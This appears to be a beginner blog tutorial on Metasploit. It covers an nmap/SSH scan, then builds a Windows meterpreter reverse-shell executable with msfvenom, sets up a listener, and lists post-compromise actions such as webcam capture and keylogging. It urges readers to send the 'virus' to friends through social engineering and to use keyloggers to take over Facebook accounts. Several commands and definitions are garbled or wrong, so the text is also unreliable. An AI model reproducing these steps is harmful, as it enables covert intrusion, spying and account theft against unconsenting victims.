0 0
Read Time:6 Minute, 31 Second

In this article, we will talk about the Metasploit framework.

I am sure you have heard of Metasploit before and maybe its what and how to use it is still confused? It’s a framework, which means it’s a collection of many pieces of software.

You can collect information, create malware, hack FTP, hack Android and many more things. You will find out by using it.

It is pre-installed in Kali or Parrot OS. There is a paid version and a free version.

Of course, Kali comes with the free version. You can also install it on Windows.

Nmap is also integrated into Metasploit; you can use Nmap in Metasploit without needing to open a new Terminal. In this post, I will explain how to use Metasploit and collect information about my server.

After that you will be able to understand Metasploit commands from other tutorials and very soon be able to create your own tutorial.

What is an exploit with Metasploit?

In Metasploit exploit means to exploit. If you installed the reverse shell correctly on the target machine, you can explore the system with the help of exploit. By default, 1590 exploits are available in Metasploit. I would also link to an article that explains how to add your own exploit in Metasploit.

payload

The payload is a piece of code that helps to hack into the system and exploit helps to do whatever you want to do with the hacked machine. It helps you create a virus.

msfencode

According to offensive-security, msfencode is another great little tool in the framework’s arsenal when it comes to exploit development. Most of the time, one cannot simply use the generated shellcode directly on msfpayload. It must be target-encoded in order to work properly. This might mean turning your shellcode to pure alphanumeric, stripping out bad characters, or encoding it for a 64-bit target.

Important Network Vocabulary 

LHOST: lhost is the attacker’s IP address

LPORT: This is the port you want to use

RHOST: This is the victim machine’s IP address

RPORT: The victim’s port number.

Ok, let’s start with Metasploit. I advise you, if you want to become a master, not to copy the commands, but to rewrite them.

Open Terminal and enter:

root@kali:~# service postgresql start

This helps to run Metasploit correctly.

Now enter:

root@kali:~# msfconsole

This will launch Metasploit. It may take a little time, as it contains a large number of exploits.

To view the different types of exploits:

root@kali:~# Show exploits

This command will show all exploits. In front of each exploit, you will find a description and an example of how to use the exploit.

I’m going to retrieve information from the server of my website. To do this, you must use an SSH_version exploit. Come in :

root@kali:~# search ssh_version

As you can see, this shows all exploits related to SSH_version.

I will use ssh_version_15 for which here are the commands [to use any exploit, just enter: use exploit name ]

root@kali:~# Use auxiliary/fuzzers/ssh/ssh_version_15

The next command is: show options.

As you can see, we need to set RHOST. I have already informed you that RHOST stands for target IP address. We need to scan my website to get the IP address. As I told you above, Nmap is integrated with Metasploit. Here are the Nmap commands for scanning.

root@kali:~# nmap –A opentechinfo.com –p 22 -vv

In the above command -A is the hostname and -p for the port because there are 65000 ports Scanning all the ports is very time consuming, but since SSH is using port 22 I have already specified that for win time.

As you can see my IP address is 104.27.170.122 and my port is filtered which means it can be assumed to be closed. In case the port is closed, it won’t work, but I don’t have permission to attack another website, so I use this:

Set RHOST 104.27.170.122

Last step

If you now type: “run”, it will show you the OS.

As I told you above, my port is closed, so this won’t work. Don’t be sad, it will work on any other website that has port 22 open.

Now that you have the basic knowledge of Metasploit, let’s do something interesting with Metasploit. By this I mean creating a virus for Windows.

Hack Windows with Metasploit

Open Terminal and enter msfvenom. This will show you the principle of creating a virus.

msfconsole will only load exploits, but msfvenom will load exploits with encodings. I hope you read the definition of payload earlier in the article.

OK, enter:

root@kali:~# msfvenom –p windows/meterpreter_reverse_tcp –f exe –a x86 –platform windows LHOST 192.168.174.192 LPORT 4444 –o santy.exe

  • Ok, let me explain these commands
  • -p prepare the payload.
  • -f exe indicates that the file type, or file extension will be exe
  • -a x86 indicates the system architecture. x86 is used in 32-bit systems, even if my system is 64-bit, you can run a 32-bit program on a 64-bit system.
  • –platform windows indicates that this virus is for Windows.
  • -LHOST and LPORT are already explained above. To know your LHOST, type ipconfig. Note that you must always use the IP address of the interface in operation.
  • -o is the save path of the file, with its name. As I want to save it in the root folder, I only specify its name.

Note: enter these arguments in the order I entered them, if you reverse the position of the arguments, then Metasploit will not be able to create the virus.

Here is what you get if you enter this command correctly. The file will be saved in the current working directory.

The next command to enter:

root@kali:~# use mulit/handler

Now you need to install Payload.

root@kali:~# Set PAYLOAD windows/meterpreter/reverse_tcp

Payload should be the same one you used to create the malware.

Your LHOST is your IP address, you know how to enter it. If you don’t know your IP address, open a new tab by pressing shift+ctrl+T and enter ipconfig, this will show your local IP address.

In my case it’s 192.168.174.129 your IP should be in a similar format, but not identical.

root@kali:~# Set LHOST 192.168.174.129

root@kali:~# Set LPORT 4444

Last order

Type exploit or run. Both work the same way.

Now just send this virus to your friends. Use your social engineering skills.

In my case I use VMware, so I just copy and paste to my host machine running Windows 10.

When the victim launches this program, you will see that Metasploit and Meterpreter will open, as shown in the screenshot.

This means that you have successfully hacked into the victim machine. Here are some important operations that you can perform on the victim machine.

  • You can take photos from the webcam, or record live videos.
  • Record keystrokes (keylogger)
  • Download or Upload files to the victim machine.
  • Shut down or restart the computer.

Above are some examples, type “help” to find out what you can do on the victim computer, as well as how to do them.

To take a photo via the webcam, enter:

root@kali:~# webcam_snap

To record keystrokes, enter “start keyscan_start” then after a while enter “keyscan_stop”, to see what was typed, “keyscan_demp”. Keyloggers are a great way to hack a Facebook account.

As the help menu shows, you can also download or upload files, or view files from the victim machine.

OK, I hope you have learned some things from this article. Have fun !

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %